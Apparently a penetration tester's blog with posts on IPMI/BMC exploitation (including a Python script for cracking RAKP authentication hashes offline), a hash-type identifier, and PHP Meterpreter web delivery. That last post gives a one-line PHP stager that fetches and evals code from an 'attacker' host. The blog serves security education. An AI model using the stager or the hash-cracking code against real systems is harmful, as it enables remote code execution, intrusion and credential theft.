Friday, March 27, 2015

IPMI and BMC Exploitation

A quick brain dump of resources/vulns/techniques for pwning IPMI devices:

Awesome work in this area by Rapid7, Dan Farmer, etc.

Educate yo-self

https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi

Discovery

http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version

Vulns

https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities

Exploits (MSF)

http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes
http://www.rapid7.com/db/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner
http://www.rapid7.com/db/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner
http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero
http://www.rapid7.com/db/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure
http://server:49152/PSBlock  (the Supermicro port 49152 exposure the module above checks for: the PSBlock file served there holds account credentials in the clear)
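
What ipmi_dumphashes actually hands you, shown as an added example (this is not the post's code and not the Metasploit module): in IPMI 2.0 RAKP, message 2 from the BMC carries HMAC-SHA1 keyed with the user's password over the session IDs, both random numbers, the BMC GUID, the role byte and the username, and it is sent before the console has proved anything. The field layout below follows the IPMI 2.0 RAKP message 2 definition; the session IDs, nonces and GUID are constructed values, not captured traffic, and the 0x14 role byte is the Administrator-with-name-only-lookup value the dumphashes module requests.

```python
"""
Offline cracking of an IPMI 2.0 RAKP message-2 authentication code.

Added example; not the post's code and not the Metasploit module. In the RAKP
handshake the BMC answers RAKP message 1 with message 2, which carries
HMAC-SHA1 keyed with the *user's password* over the two session IDs, both
random numbers, the BMC GUID, the requested role byte and the username.
That value goes out before the console has authenticated, so anyone who can
reach UDP/623 and name a valid user gets a hash to crack offline.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# Role byte from RAKP message 1: Administrator (0x04) with the
# "username-only lookup" bit (0x10) set, which is what ipmi_dumphashes sends.
ROLE_ADMIN_NAME_ONLY = 0x14


def rakp2_auth_buffer(console_sid: bytes, bmc_sid: bytes, console_rand: bytes,
                      bmc_rand: bytes, bmc_guid: bytes, role: int,
                      username: str) -> bytes:
    """Fields in wire order: SIDm | SIDc | Rm | Rc | GUIDc | ROLEm | ULENGTH | UNAME."""
    if len(console_sid) != 4 or len(bmc_sid) != 4:
        raise ValueError("session IDs are 4 bytes each")
    if not (len(console_rand) == len(bmc_rand) == len(bmc_guid) == 16):
        raise ValueError("random numbers and GUID are 16 bytes each")
    uname = username.encode("ascii")
    return (console_sid + bmc_sid + console_rand + bmc_rand + bmc_guid
            + bytes([role, len(uname)]) + uname)


def rakp2_auth_code(password: str, buf: bytes) -> bytes:
    """The value the BMC returns in RAKP message 2: HMAC-SHA1(password, buf)."""
    return hmac.new(password.encode("utf-8"), buf, hashlib.sha1).digest()


def john_line(username: str, buf: bytes, auth_code: bytes) -> str:
    """john's 'rakp' format: user:$rakp$<hex salt>$<hex hmac>."""
    return f"{username}:$rakp${buf.hex()}${auth_code.hex()}"


def hashcat_line(buf: bytes, auth_code: bytes) -> str:
    """hashcat -m 7300 (IPMI2 RAKP HMAC-SHA1): <hex salt>:<hex hmac>."""
    return f"{buf.hex()}:{auth_code.hex()}"


def crack(buf: bytes, auth_code: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose HMAC matches, else None."""
    for pw in candidates:
        if hmac.compare_digest(rakp2_auth_code(pw, buf), auth_code):
            return pw
    return None


# Constructed sample exchange; the values are made up, not captured traffic.
SAMPLE_USER = "ADMIN"
SAMPLE_BUF = rakp2_auth_buffer(
    console_sid=bytes.fromhex("a4a3a2a0"),
    bmc_sid=bytes.fromhex("0200ed40"),
    console_rand=bytes(range(0x10, 0x20)),
    bmc_rand=bytes(range(0x30, 0x40)),
    bmc_guid=bytes.fromhex("0c0f0b0e0a0d0b0c0a0e0c0f0b0e0d0c"),
    role=ROLE_ADMIN_NAME_ONLY,
    username=SAMPLE_USER,
)
# What a BMC whose ADMIN account still has the password "ADMIN" would answer with.
SAMPLE_AUTH_CODE = rakp2_auth_code("ADMIN", SAMPLE_BUF)

if __name__ == "__main__":
    print(john_line(SAMPLE_USER, SAMPLE_BUF, SAMPLE_AUTH_CODE))
    print(hashcat_line(SAMPLE_BUF, SAMPLE_AUTH_CODE))
    print("cracked:", crack(SAMPLE_BUF, SAMPLE_AUTH_CODE, ["password", "admin", "ADMIN"]))
```

The john_line output goes to john --format=rakp and the hashcat_line output to hashcat -m 7300; crack() is the same computation in a loop, kept here so the layout of the salted data is visible. Note that the username is part of the salt, so a candidate hash only cracks for the account it was requested for.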

Other resources

http://fish2.com/ipmi/
https://community.rapid7.com/community/metasploit/blog/2013/11/15/exploiting-the-supermicro-onboard-ipmi-controller
blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras
https://pedromadias.wordpress.com/2012/06/25/all-your-asus-servers-ikvmipmi-may-belong-to-other/
http://blog.devicenull.org/2014/02/02/supermicro-ipmi-firmware-x8sil-f-analysis.html


I will update with more coherence when I get more time...

Thursday, January 8, 2015

Password Hash Identifier

So I recently saw KoreLogic post a link to a password hash dump on pastebin located here: http://pastebin.com/A3JSbdzm

It was not a typical hash dump: rather than cracked or uncracked hashes, it listed hash types followed by example hashes. When faced with a funky password hash, I typically call upon john the ripper to do the identification for me; however, I have been in multiple scenarios where the result is either unclear or john cannot identify the hash(es) I have. This pastebin dump was the kick in the pants I needed to write a tool of my own that attempts to identify the hash type of a given hash.

If an exact match cannot be found, the script will give you "possible" matches (a bare string of 32 hex characters, for instance, could be MD5, NTLM, MD4 or LM). I have incorporated the hash types mentioned above as well as the list from the hashcat site here: http://hashcat.net/wiki/doku.php?id=example_hashes
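
To show the exact-versus-possible split that the script relies on, here is an added example (not the post's hashes.py): formats with a distinctive prefix or structure are reported as exact matches, while bare hex digests are only ever "possible" because several algorithms share each length. The pattern table is a constructed subset of common formats, not the full hashes.txt list; the sample inputs at the bottom are made up.

```python
"""
Identify a password hash's type from its format.

Added example (not the post's hashes.py). Unambiguous formats are reported as
exact matches; bare hex digests are reported only as "possible", because
several algorithms share each digest length. The pattern table is a
constructed subset of common formats, not the post's full hashes.txt list.
"""
import re
import sys
from typing import Dict, List

# Formats whose prefix or layout pins down the algorithm.
EXACT_PATTERNS = [
    ("md5crypt ($1$) / Cisco IOS type 5", re.compile(r"^\$1\$[./0-9A-Za-z]{0,8}\$[./0-9A-Za-z]{22}$")),
    ("Apache APR1 MD5", re.compile(r"^\$apr1\$[./0-9A-Za-z]{0,8}\$[./0-9A-Za-z]{22}$")),
    ("bcrypt", re.compile(r"^\$2[abxy]?\$\d{2}\$[./0-9A-Za-z]{53}$")),
    ("sha256crypt ($5$)", re.compile(r"^\$5\$(rounds=\d+\$)?[./0-9A-Za-z]{0,16}\$[./0-9A-Za-z]{43}$")),
    ("sha512crypt ($6$)", re.compile(r"^\$6\$(rounds=\d+\$)?[./0-9A-Za-z]{0,16}\$[./0-9A-Za-z]{86}$")),
    ("MySQL 4.1+", re.compile(r"^\*[0-9A-F]{40}$")),
    ("Django PBKDF2-SHA256", re.compile(r"^pbkdf2_sha256\$\d+\$[^$]+\$[A-Za-z0-9+/=]+$")),
    ("IPMI2 RAKP HMAC-SHA1 (john $rakp$)", re.compile(r"^\$rakp\$[0-9a-f]+\$[0-9a-f]{40}$")),
    ("traditional DES crypt", re.compile(r"^[./0-9A-Za-z]{13}$")),
]

# Bare hex digests: the length narrows the field but cannot pick one algorithm.
HEX_LENGTH_CANDIDATES: Dict[int, List[str]] = {
    8: ["CRC32", "Adler-32"],
    16: ["MySQL323"],
    32: ["MD5", "NTLM", "MD4", "LM", "MD2"],
    40: ["SHA-1", "RIPEMD-160", "Tiger-160", "MySQL 4.1+ missing its leading *"],
    56: ["SHA-224", "SHA3-224"],
    64: ["SHA-256", "SHA3-256", "GOST R 34.11-94", "BLAKE2s"],
    96: ["SHA-384", "SHA3-384"],
    128: ["SHA-512", "SHA3-512", "Whirlpool", "BLAKE2b"],
}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def identify(h: str) -> Dict[str, List[str]]:
    """Return {'exact': [...], 'possible': [...]} for one hash string."""
    h = h.strip()
    exact = [name for name, rx in EXACT_PATTERNS if rx.match(h)]
    possible: List[str] = []
    if not exact and HEX_RE.match(h):
        possible = list(HEX_LENGTH_CANDIDATES.get(len(h), []))
    return {"exact": exact, "possible": possible}


def report(h: str) -> str:
    """One line per hash, in the spirit of `python hashes.py '[hash]'`."""
    r = identify(h)
    if r["exact"]:
        return f"{h}: {', '.join(r['exact'])}"
    if r["possible"]:
        return f"{h}: no exact match; possible: {', '.join(r['possible'])}"
    return f"{h}: unknown format"


if __name__ == "__main__":
    # Constructed samples used when no hash is given on the command line.
    samples = sys.argv[1:] or [
        "$1$abcdefgh$" + "a" * 22,
        "5f4dcc3b5aa765d61d8327deb882cf99",
        "*" + "A" * 40,
        "hello world",
    ]
    for s in samples:
        print(report(s))
```

The design choice worth copying is the two-tier result: a regex hit on a prefixed format is an identification, but a hit on a length table is a hint, and a tool that collapses the two will confidently call an NTLM hash MD5. Real identifiers add context (where the hash came from, companion fields such as a salt or username) to shrink the "possible" list further.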

To use it you will need to download the python script and the associated hash list.

https://github.com/jakxx/Scripts/blob/master/hashes.py
https://github.com/jakxx/Scripts/blob/master/hashes.txt

Once you have them, usage is simple:

python hashes.py '[hash]'

An example can be seen below.


Cheers.

Friday, February 21, 2014

PHP Meterpreter Web Delivery

I recently found myself in a situation where I had command execution through a web application but wanted to upgrade to a reverse shell with Meterpreter functionality. I had two roadblocks: I needed to bypass antivirus, and some of the local executables were locked down, such as powershell (sadface), the net commands, ipconfig, etc. (sidenote: shoutout to Chris (@obscuresec) for some great ideas on getting around locked down files)

After some research I was able to set up a simple PHP command-and-control-type scenario in which the server would reach out to my attacking machine and execute whatever code I specified there, using a combination of eval and file_get_contents. This left a very small footprint (one line) on the target machine and let me execute larger blocks of code, since my initial command execution bug was limited by length. The PHP code went something like this:

<?php eval(file_get_contents('http://attacker/boom.txt')); ?>

This way I had no size limitations and had access to all the functionality of PHP, which is quite a bit. Two things to keep in mind: eval() takes bare PHP code, so boom.txt must not begin with an opening <?php tag, and file_get_contents() over HTTP only works while allow_url_fopen is enabled (it is by default). I ended up enumerating the internal network using PHP to do things like scan ports, grab internal web pages, etc.

All this to say, it got me thinking and after a quick refresher, I dove back into ruby world to try to hack together a metasploit module that will automate this and provide the elusive meterpreter. The super flexible, ninja module structure credit goes to Ben Campbell (@meatballs__).

Simply configure the options



...and execute the printed command on the targeted system



Update*
I have added support for python and combined this module with the psh_web_delivery module. The resulting module has been merged into the metasploit framework. You can find the module here.